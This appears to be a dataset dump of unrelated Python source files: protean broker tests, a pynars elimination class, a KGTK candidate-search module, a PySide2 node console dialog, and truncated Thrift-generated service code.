text stringlengths 957 885k |
|---|
import pytest
from mock import patch
from protean import BaseCommand, BaseCommandHandler, BaseEvent, BaseSubscriber
from protean.adapters.broker.inline import InlineBroker
from protean.exceptions import ConfigurationError
from protean.fields import Auto, Integer, String
from protean.infra.eventing import EventLog
from protean.port.broker import BaseBroker
from protean.utils import CommandProcessingType
class PersonAdded(BaseEvent):
id = Auto(identifier=True)
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
class NotifySSOSubscriber(BaseSubscriber):
class Meta:
event = PersonAdded
def __call__(self, domain_event_dict):
print("Received Event: ", domain_event_dict)
class AddPersonCommand(BaseCommand):
first_name = String(max_length=50, required=True)
last_name = String(max_length=50, required=True)
age = Integer(default=21)
class AddNewPersonCommandHandler(BaseCommandHandler):
"""CommandHandler that adds a new person into the system"""
class Meta:
command_cls = AddPersonCommand
def notify(self, command):
print("Received command: ", command)
class TestBrokerInitialization:
@pytest.fixture(autouse=True)
def register_elements(self, test_domain):
test_domain.register(PersonAdded)
def test_that_base_broker_class_cannot_be_instantiated(self):
with pytest.raises(TypeError):
BaseBroker()
def test_that_a_concrete_broker_can_be_initialized_successfully(self, test_domain):
broker = InlineBroker("dummy_name", test_domain, {})
assert broker is not None
def test_that_domain_initializes_broker_from_config(self, test_domain):
assert len(list(test_domain.brokers)) == 1
assert isinstance(list(test_domain.brokers.values())[0], InlineBroker)
def test_that_atleast_one_broker_has_to_be_configured(self, test_domain):
default_broker = test_domain.config["BROKERS"].pop("default")
with pytest.raises(ConfigurationError):
len(test_domain.brokers) # Triggers an initialization
# Push back default broker config to avoid pytest teardown errors
test_domain.config["BROKERS"]["default"] = default_broker
def test_that_a_default_broker_is_mandatory(self, test_domain):
dup_broker = InlineBroker("duplicate", test_domain, {})
# Simulation - Add a secondary broker and remove default broker from config
default_broker = test_domain.config["BROKERS"].pop("default")
test_domain.config["BROKERS"]["secondary"] = {
"PROVIDER": "protean.adapters.InlineBroker"
}
with pytest.raises(ConfigurationError):
# This will try to initialize brokers and fail in absence of a 'default' broker
test_domain.brokers["duplicate"] = dup_broker
# Push back default broker config to avoid pytest teardown errors
test_domain.config["BROKERS"]["default"] = default_broker
def test_that_domain_initializes_broker_before_iteration(self, test_domain):
brokers = [broker for broker in test_domain.brokers]
assert len(brokers) == 1
def test_that_domain_initializes_broker_before_get_op(self, mocker, test_domain):
spy = mocker.spy(test_domain.brokers, "_initialize")
test_domain.brokers["default"] # Calls `__getitem__`
assert spy.call_count == 1
def test_that_brokers_are_not_initialized_again_before_get_op_if_initialized_already(
self, mocker, test_domain
):
# Initialize brokers
len(test_domain.brokers)
spy = mocker.spy(test_domain.brokers, "_initialize")
test_domain.brokers["default"] # # Calls `__getitem__`, Should not reinitialize
assert spy.call_count == 0
def test_that_domain_initializes_broker_before_set_operation(
self, mocker, test_domain
):
dup_broker = InlineBroker("duplicate broker", test_domain, {})
spy = mocker.spy(test_domain.brokers, "_initialize")
test_domain.brokers["dup"] = dup_broker
assert spy.call_count == 1
def test_that_brokers_are_not_initialized_again_before_set_if_initialized_already(
self, mocker, test_domain
):
# Initialize brokers
len(test_domain.brokers)
dup_broker = InlineBroker("duplicate broker", test_domain, {})
spy = mocker.spy(test_domain.brokers, "_initialize")
test_domain.brokers["dup"] = dup_broker # Should not reinitialize
assert spy.call_count == 0
def test_that_domain_initializes_broker_before_del_operation(
self, mocker, test_domain
):
spy = mocker.spy(test_domain.brokers, "_initialize")
del test_domain.brokers["default"]
assert spy.call_count == 1
def test_that_brokers_are_not_initialized_again_before_del_if_initialized_already(
self, mocker, test_domain
):
len(test_domain.brokers)
spy = mocker.spy(test_domain.brokers, "_initialize")
del test_domain.brokers["default"]
assert spy.call_count == 0
def test_that_brokers_are_initialized_on_publishing_an_event(
self, mocker, test_domain
):
spy = mocker.spy(test_domain.brokers, "_initialize")
test_domain.publish(
PersonAdded(id="1234", first_name="John", last_name="Doe", age=24,)
)
assert spy.call_count == 1
def test_that_brokers_are_not_reinitialized_on_publishing_an_event(
self, mocker, test_domain
):
len(test_domain.brokers) # Triggers initialization
spy = mocker.spy(test_domain.brokers, "_initialize")
test_domain.publish(
PersonAdded(id="1234", first_name="John", last_name="Doe", age=24,)
)
assert spy.call_count == 0
def test_that_brokers_are_initialized_on_receiving_a_command(
self, mocker, test_domain
):
test_domain.register(AddPersonCommand)
test_domain.register(AddNewPersonCommandHandler)
spy = mocker.spy(test_domain.brokers, "_initialize")
test_domain.publish(
AddPersonCommand(first_name="John", last_name="Doe", age=21)
)
assert spy.call_count == 1
def test_that_brokers_are_not_reinitialized_on_receiving_a_command(
self, mocker, test_domain
):
test_domain.register(AddPersonCommand)
test_domain.register(AddNewPersonCommandHandler)
len(test_domain.brokers) # Triggers initialization
spy = mocker.spy(test_domain.brokers, "_initialize")
test_domain.publish(
AddPersonCommand(first_name="John", last_name="Doe", age=21)
)
assert spy.call_count == 0
def test_that_brokers_can_be_registered_manually(self, test_domain):
duplicate_broker = InlineBroker("duplicate broker", test_domain, {})
test_domain.brokers["duplicate"] = duplicate_broker
assert len(test_domain.brokers) == 2
class TestBrokerSubscriberInitialization:
def test_that_registered_subscribers_are_initialized(self, test_domain):
test_domain.register(NotifySSOSubscriber)
len(test_domain.brokers) # Triggers initialization
assert (
"tests.test_brokers.PersonAdded"
in test_domain.brokers["default"]._subscribers
)
assert (
NotifySSOSubscriber
in test_domain.brokers["default"]._subscribers[
"tests.test_brokers.PersonAdded"
]
)
def test_that_subscribers_with_unknown_brokers_cannot_be_initialized(
self, test_domain
):
NotifySSOSubscriber.meta_.broker = "unknown"
test_domain.register(NotifySSOSubscriber)
with pytest.raises(ConfigurationError):
len(test_domain.brokers) # Triggers initialization
# Reset the broker after test
NotifySSOSubscriber.meta_.broker = "default"
class TestEventPublish:
@pytest.fixture(autouse=True)
def register_elements(self, test_domain):
test_domain.register(PersonAdded)
def test_that_broker_receives_event(self, mocker, test_domain):
spy = mocker.spy(test_domain.brokers, "publish")
test_domain.publish(
PersonAdded(id="1234", first_name="John", last_name="Doe", age=24,)
)
assert spy.call_count == 1
def test_that_event_log_is_populated(self, mocker, test_domain):
test_domain.register(EventLog)
test_domain.publish(
PersonAdded(id="1234", first_name="John", last_name="Doe", age=24,)
)
events = test_domain.repository_for(EventLog).all()
assert len(events) == 1
class TestBrokerCommandHandlerInitialization:
def test_that_registered_command_handlers_are_initialized(self, test_domain):
test_domain.register(AddNewPersonCommandHandler)
assert (
"tests.test_brokers.AddPersonCommand"
in test_domain.brokers["default"]._command_handlers
)
assert (
test_domain.brokers["default"]._command_handlers[
"tests.test_brokers.AddPersonCommand"
]
is AddNewPersonCommandHandler
)
assert (
test_domain.command_handler_for(AddPersonCommand)
== AddNewPersonCommandHandler
)
def test_that_subscribers_with_unknown_brokers_cannot_be_initialized(
self, test_domain
):
AddNewPersonCommandHandler.meta_.broker = "unknown"
test_domain.register(AddNewPersonCommandHandler)
with pytest.raises(ConfigurationError):
len(test_domain.brokers) # Triggers initialization
# Reset the broker after test
AddNewPersonCommandHandler.meta_.broker = "default"
class TestCommandPublish:
@patch.object(AddNewPersonCommandHandler, "__call__")
def test_that_brokers_receive_a_command(self, mock, test_domain):
test_domain.register(AddPersonCommand)
test_domain.register(AddNewPersonCommandHandler)
test_domain.config["COMMAND_PROCESSING"] = CommandProcessingType.SYNC.value
command = AddPersonCommand(first_name="John", last_name="Doe", age=21)
test_domain.handle(command)
mock.assert_called_once_with(command)
|
from typing import Dict, List, Tuple
from bidict import bidict
from pynars.Narsese import Term
from pynars.utils.IndexVar import IntVar
from .Substitution import Substitution
class Elimination(Substitution):
'''
the substitution of var-to-const
'''
def __init__(self, term_src: Term, term_tgt: Term, ivar_src: List[IntVar]=None, iconst_tgt: List[Term]=None, dvar_src: List[IntVar]=None, dconst_tgt: List[Term]=None, qvar_src: List[IntVar]=None, qconst_tgt: List[Term]=None) -> None:
super().__init__(term_src, term_tgt) #, ivar_src, iconst_tgt, dvar_src, dconst_tgt, qvar_src, qconst_tgt)
# is_conflict_ivar = is_conflict_dvar = is_conflict_qvar = False
if (ivar_src is not None and iconst_tgt is not None):
self.is_conflict_ivar, self.mapping_ivar = self.check_conflict(ivar_src, iconst_tgt)
if (dvar_src is not None and dconst_tgt is not None):
self.is_conflict_dvar, self.mapping_dvar = self.check_conflict(dvar_src, dconst_tgt)
if (qvar_src is not None and qconst_tgt is not None):
self.is_conflict_qvar, self.mapping_qvar = self.check_conflict(qvar_src, qconst_tgt)
# self._is_conflict = is_conflict_ivar or is_conflict_dvar or is_conflict_qvar
@property
def is_valid(self):
return self.is_qvar_valid or self.is_dvar_valid or self.is_ivar_valid
@property
def is_qvar_valid(self):
return not self.is_conflict_qvar and len(self.mapping_qvar) > 0
@property
def is_dvar_valid(self):
return not self.is_conflict_dvar and len(self.mapping_dvar) > 0
@property
def is_ivar_valid(self):
return not self.is_conflict_ivar and len(self.mapping_ivar) > 0
@staticmethod
def check_conflict(vars: List[IntVar], consts: List[Term]) -> Tuple[bool, Dict[IntVar, Term]]:
'''
no conflict:
(&&, <$x-->A>, <$y-->A>)
(&&, <B-->A>, <C-->A>)
[0, 1], [B, C]
[0, 1], [C, B]
conflict:
(&&, <$x-->A>, <$x-->B>)
(&&, <C-->A>, <D-->B>)
[0, 0], [C, D]
'''
mapping_ret = bidict()
if len(vars) != len(consts): return True, mapping_ret
mapping = {key: set() for key in set(vars)}
is_conflict = False
for var, const in zip(vars, consts):
var_list = mapping[var]
var_list.add(const)
if len(var_list) > 1:
is_conflict = True
break
if not is_conflict:
mapping_ret = bidict({key: list(value)[0] for key, value in mapping.items()})
return is_conflict, mapping_ret
def apply(self, term_src: Term=None, term_tgt: Term=None):
''''''
term_src = term_src if term_src is not None else self.term_src
term_tgt = term_tgt if term_tgt is not None else self.term_tgt
mapping_ivar = self.mapping_ivar
mapping_dvar = self.mapping_dvar
mapping_qvar = self.mapping_qvar
mapping_const = self.mapping_const
# TODO: replace var with const
pass |
<filename>tl/candidate_generation/get_kgtk_search_matches.py
import requests
import pandas as pd
from typing import List
from concurrent.futures import ThreadPoolExecutor
from itertools import repeat
from tl.file_formats_validator import FFV
from tl.exceptions import UnsupportTypeError
from tl.exceptions import RequiredInputParameterMissingException
from tl.candidate_generation.es_search import Search
from tl.candidate_generation.utility import Utility
class KGTKSearchMatches(object):
def __init__(self, es_url, es_index, api_url='https://kgtk.isi.edu/api', es_user=None, es_pass=None):
self.api_url = api_url
self.ffv = FFV()
self.es_search = Search(es_url, es_index, es_user, es_pass)
self.utility = Utility(self.es_search)
def get_matches(self, column, size=20, file_path=None, df=None, output_column_name: str = "retrieval_score",
auxiliary_fields: List[str] = None, auxiliary_folder: str = None,
auxiliary_file_prefix='kgtk_search_', max_threads=50):
"""
uses KGTK search API to retrieve identifiers of KG entities matching the input search term.
Args:
column: the column used for retrieving candidates.
size: maximum number of candidates to retrieve, default is 20.
file_path: input file in canonical format
df: input dataframe in canonical format,
output_column_name: the output column name where the normalized scores will be stored.Default is
kgtk_retrieval_score
Returns: a dataframe in candidates format
"""
if file_path is None and df is None:
raise RequiredInputParameterMissingException(
'One of the input parameters is required: {} or {}'.format("file_path", "df"))
if file_path:
df = pd.read_csv(file_path, dtype=object)
df.fillna(value="", inplace=True)
columns = df.columns
uniq_labels = list(df[column].unique())
max_threads = min(len(uniq_labels), max_threads)
results_dict = {}
with ThreadPoolExecutor(max_workers=max_threads) as executor:
for _results_dict in executor.map(
self.kgtk_api_search, uniq_labels, repeat(size)):
results_dict.update(_results_dict)
# for uniq_label in uniq_labels:
# results_dict.update(self.kgtk_api_search(size, uniq_label))
new_df_list = list()
seen_dict = {}
all_candidates = []
candidate_aux_dict = {}
for i, row in df.iterrows():
row_key = f"{row['column']}_{row['row']}_{row[column]}"
row_candidates = set()
if row_key not in seen_dict:
search_results = results_dict.get(row[column], [])
if len(search_results) > 0:
for sr in search_results:
_ = {}
for c in columns:
_[c] = row[c]
_['kg_id'] = sr['qnode']
row_candidates.add(sr['qnode'])
_['pagerank'] = sr['pagerank']
kg_label = []
kg_description = ''
if 'label' in sr and len(sr['label']) > 0:
kg_label.extend(sr['label'])
if 'alias' in sr and len(sr['alias']) > 0:
kg_label.extend(sr['alias'])
_['kg_labels'] = "|".join(kg_label)
_['method'] = 'kgtk-search'
if 'description' in sr and len(sr['description']) > 0:
kg_description = "|".join(sr['description'])
_['kg_descriptions'] = kg_description
_[output_column_name] = sr['score']
new_df_list.append(_)
all_candidates.extend(self.es_search.get_node_info(list(row_candidates)))
else:
_ = {}
for c in columns:
_[c] = row[c]
_['kg_id'] = ''
_['pagerank'] = ''
_['kg_labels'] = ''
_['method'] = 'kgtk-search'
_['kg_descriptions'] = ''
_[output_column_name] = ''
new_df_list.append(_)
seen_dict[row_key] = 1
for candidate in all_candidates:
_id = candidate['_id']
_source = candidate['_source']
if _id not in candidate_aux_dict:
candidate_aux_dict[_id] = {}
if auxiliary_fields is not None:
for auxiliary_field in auxiliary_fields:
if auxiliary_field in _source:
candidate_aux_dict[_id][auxiliary_field] = _source[auxiliary_field]
self.utility.write_auxiliary_files(auxiliary_folder, candidate_aux_dict, auxiliary_fields,
prefix=auxiliary_file_prefix)
if self.ffv.is_canonical_file(df):
return pd.DataFrame(new_df_list)
if self.ffv.is_candidates_file(df):
return pd.concat([df, pd.DataFrame(new_df_list)]).sort_values(by=['column', 'row', column])
raise UnsupportTypeError("The input file is neither a canonical file or a candidate file!")
def kgtk_api_search(self, uniq_label: str, size: int) -> dict:
results_dict = dict()
api_search_url = f"{self.api_url}?q=" \
f"{uniq_label}&extra_info=true&language=en&type=ngram&size={size}&lowercase=true"
results_dict[uniq_label] = requests.get(api_search_url).json()
return results_dict
|
from PySide2.QtCore import Qt, SIGNAL, QProcess, QByteArray
from PySide2.QtWidgets import QDialog, QGridLayout, QTextEdit, QLineEdit, QCompleter
from pygments import highlight
from pygments.formatters.html import HtmlFormatter
from pygments.lexers.data import JsonLexer
from node_launcher.logging import log
class ConsoleDialog(QDialog):
def __init__(self, node):
super().__init__()
self.node = node
self.show_help = True
self.layout = QGridLayout()
self.setLayout(self.layout)
self.output_area = QTextEdit()
self.output_area.setReadOnly(True)
self.output_area.acceptRichText = True
self.output_area.document().setMaximumBlockCount(5000)
self.layout.addWidget(self.output_area)
self.input_area = QLineEdit()
self.completer = QCompleter()
# noinspection PyUnresolvedReferences
self.completer.setCaseSensitivity(Qt.CaseInsensitive)
self.input_area.setCompleter(self.completer)
self.input_area.setFocus()
self.layout.addWidget(self.input_area)
self.connect(self.input_area, SIGNAL("returnPressed(void)"),
self.execute_user_command)
@property
def cli(self):
try:
return self.node.software.cli
except AttributeError:
return None
@property
def cli_args(self):
try:
return self.node.configuration.cli_args
except AttributeError:
return None
def showEvent(self, event):
super().showEvent(event)
if self.show_help:
success = self.run_command('help')
if success:
self.show_help = False
def execute_user_command(self):
cmd = str(self.input_area.text())
self.input_area.clear()
self.run_command(cmd)
def run_command(self, command):
try:
if self.cli is None or self.cli_args is None:
self.output_area.append('Node starting up, please try again later...')
return False
self.output_area.append(f'> {command}\n')
process = QProcess()
process.setProgram(self.cli)
process.setCurrentReadChannel(0)
# noinspection PyUnresolvedReferences
process.readyReadStandardError.connect(
lambda: self.handle_cli_error_output(process)
)
# noinspection PyUnresolvedReferences
process.readyReadStandardOutput.connect(
lambda: self.handle_cli_output(process)
)
args = command.split(' ')
if args[0] == self.cli.split('/')[-1]:
args.pop(0)
process.setArguments(self.cli_args + args)
process.start()
log.info(
'run_command',
program=self.cli,
args=self.cli_args,
cmd=command
)
return True
except Exception:
self.output_area.append('Node starting up, please try again later...')
return False
def handle_cli_error_output(self, cli_process: QProcess):
output: QByteArray = cli_process.readAllStandardError()
message = output.data().decode('utf-8').strip()
self.output_area.append(message)
def handle_cli_output(self, cli_process: QProcess):
output: QByteArray = cli_process.readAllStandardOutput()
message = output.data().decode('utf-8').strip()
if message.startswith('{') or message.startswith('['):
formatter = HtmlFormatter()
formatter.noclasses = True
formatter.linenos = False
formatter.nobackground = True
message = highlight(message, JsonLexer(), formatter)
self.output_area.insertHtml(message)
else:
self.output_area.append(message)
|
#
# Autogenerated by Thrift Compiler (0.12.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def WriteCastInfo(self, req_id, cast_info_id, name, gender, intro, carrier):
"""
Parameters:
- req_id
- cast_info_id
- name
- gender
- intro
- carrier
"""
pass
def ReadCastInfo(self, req_id, cast_ids, carrier):
"""
Parameters:
- req_id
- cast_ids
- carrier
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def WriteCastInfo(self, req_id, cast_info_id, name, gender, intro, carrier):
"""
Parameters:
- req_id
- cast_info_id
- name
- gender
- intro
- carrier
"""
self.send_WriteCastInfo(req_id, cast_info_id, name, gender, intro, carrier)
self.recv_WriteCastInfo()
def send_WriteCastInfo(self, req_id, cast_info_id, name, gender, intro, carrier):
self._oprot.writeMessageBegin('WriteCastInfo', TMessageType.CALL, self._seqid)
args = WriteCastInfo_args()
args.req_id = req_id
args.cast_info_id = cast_info_id
args.name = name
args.gender = gender
args.intro = intro
args.carrier = carrier
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_WriteCastInfo(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = WriteCastInfo_result()
result.read(iprot)
iprot.readMessageEnd()
if result.se is not None:
raise result.se
return
def ReadCastInfo(self, req_id, cast_ids, carrier):
"""
Parameters:
- req_id
- cast_ids
- carrier
"""
self.send_ReadCastInfo(req_id, cast_ids, carrier)
return self.recv_ReadCastInfo()
def send_ReadCastInfo(self, req_id, cast_ids, carrier):
self._oprot.writeMessageBegin('ReadCastInfo', TMessageType.CALL, self._seqid)
args = ReadCastInfo_args()
args.req_id = req_id
args.cast_ids = cast_ids
args.carrier = carrier
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ReadCastInfo(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = ReadCastInfo_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.se is not None:
raise result.se
raise TApplicationException(TApplicationException.MISSING_RESULT, "ReadCastInfo failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["WriteCastInfo"] = Processor.process_WriteCastInfo
self._processMap["ReadCastInfo"] = Processor.process_ReadCastInfo
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_WriteCastInfo(self, seqid, iprot, oprot):
args = WriteCastInfo_args()
args.read(iprot)
iprot.readMessageEnd()
result = WriteCastInfo_result()
try:
self._handler.WriteCastInfo(args.req_id, args.cast_info_id, args.name, args.gender, args.intro, args.carrier)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except ServiceException as se:
msg_type = TMessageType.REPLY
result.se = se
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("WriteCastInfo", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_ReadCastInfo(self, seqid, iprot, oprot):
args = ReadCastInfo_args()
args.read(iprot)
iprot.readMessageEnd()
result = ReadCastInfo_result()
try:
result.success = self._handler.ReadCastInfo(args.req_id, args.cast_ids, args.carrier)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except ServiceException as se:
msg_type = TMessageType.REPLY
result.se = se
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("ReadCastInfo", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class WriteCastInfo_args(object):
"""
Attributes:
- req_id
- cast_info_id
- name
- gender
- intro
- carrier
"""
def __init__(self, req_id=None, cast_info_id=None, name=None, gender=None, intro=None, carrier=None,):
self.req_id = req_id
self.cast_info_id = cast_info_id
self.name = name
self.gender = gender
self.intro = intro
self.carrier = carrier
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.req_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.cast_info_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.BOOL:
self.gender = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.intro = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.MAP:
self.carrier = {}
(_ktype260, _vtype261, _size259) = iprot.readMapBegin()
for _i263 in range(_size259):
_key264 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val265 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.carrier[_key264] = _val265
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('WriteCastInfo_args')
if self.req_id is not None:
oprot.writeFieldBegin('req_id', TType.I64, 1)
oprot.writeI64(self.req_id)
oprot.writeFieldEnd()
if self.cast_info_id is not None:
oprot.writeFieldBegin('cast_info_id', TType.I64, 2)
oprot.writeI64(self.cast_info_id)
oprot.writeFieldEnd()
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 3)
oprot.writeString(self.name.encode('utf-8') if sys.version_info[0] == 2 else self.name)
oprot.writeFieldEnd()
if self.gender is not None:
oprot.writeFieldBegin('gender', TType.BOOL, 4)
oprot.writeBool(self.gender)
oprot.writeFieldEnd()
if self.intro is not None:
oprot.writeFieldBegin('intro', TType.STRING, 5)
oprot.writeString(self.intro.encode('utf-8') if sys.version_info[0] == 2 else self.intro)
oprot.writeFieldEnd()
if self.carrier is not None:
oprot.writeFieldBegin('carrier', TType.MAP, 6)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.carrier))
for kiter266, viter267 in self.carrier.items():
oprot.writeString(kiter266.encode('utf-8') if sys.version_info[0] == 2 else kiter266)
oprot.writeString(viter267.encode('utf-8') if sys.version_info[0] == 2 else viter267)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(WriteCastInfo_args)
WriteCastInfo_args.thrift_spec = (
None, # 0
(1, TType.I64, 'req_id', None, None, ), # 1
(2, TType.I64, 'cast_info_id', None, None, ), # 2
(3, TType.STRING, 'name', 'UTF8', None, ), # 3
(4, TType.BOOL, 'gender', None, None, ), # 4
(5, TType.STRING, 'intro', 'UTF8', None, ), # 5
(6, TType.MAP, 'carrier', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 6
)
class WriteCastInfo_result(object):
"""
Attributes:
- se
"""
def __init__(self, se=None,):
self.se = se
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.se = ServiceException()
self.se.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('WriteCastInfo_result')
if self.se is not None:
oprot.writeFieldBegin('se', TType.STRUCT, 1)
self.se.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(WriteCastInfo_result)
WriteCastInfo_result.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'se', [ServiceException, None], None, ), # 1
)
class ReadCastInfo_args(object):
"""
Attributes:
- req_id
- cast_ids
- carrier
"""
def __init__(self, req_id=None, cast_ids=None, carrier=None,):
self.req_id = req_id
self.cast_ids = cast_ids
self.carrier = carrier
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.req_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.cast_ids = []
(_etype271, _size268) = iprot.readListBegin()
for _i272 in range(_size268):
_elem273 = iprot.readI64()
self.cast_ids.append(_elem273)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.MAP:
self.carrier = {}
(_ktype275, _vtype276, _size274) = iprot.readMapBegin()
for _i278 in range(_size274):
_key279 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val280 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.carrier[_key279] = _val280
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('ReadCastInfo_args')
if self.req_id is not None:
oprot.writeFieldBegin('req_id', TType.I64, 1)
oprot.writeI64(self.req_id)
oprot.writeFieldEnd()
if self.cast_ids is not None:
oprot.writeFieldBegin('cast_ids', TType.LIST, 2)
oprot.writeListBegin(TType.I64, len(self.cast_ids))
for iter281 in self.cast_ids:
oprot.writeI64(iter281)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.carrier is not None:
oprot.writeFieldBegin('carrier', TType.MAP, 3)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.carrier))
for kiter282, viter283 in self.carrier.items():
oprot.writeString(kiter282.encode('utf-8') if sys.version_info[0] == 2 else kiter282)
oprot.writeString(viter283.encode('utf-8') if sys.version_info[0] == 2 else viter283)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(ReadCastInfo_args)
ReadCastInfo_args.thrift_spec = (
None, # 0
(1, TType.I64, 'req_id', None, None, ), # 1
(2, TType.LIST, 'cast_ids', (TType.I64, None, False), None, ), # 2
(3, TType.MAP, 'carrier', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 3
)
class ReadCastInfo_result(object):
"""
Attributes:
- success
- se
"""
def __init__(self, success=None, se=None,):
self.success = success
self.se = se
def read(self, iprot):
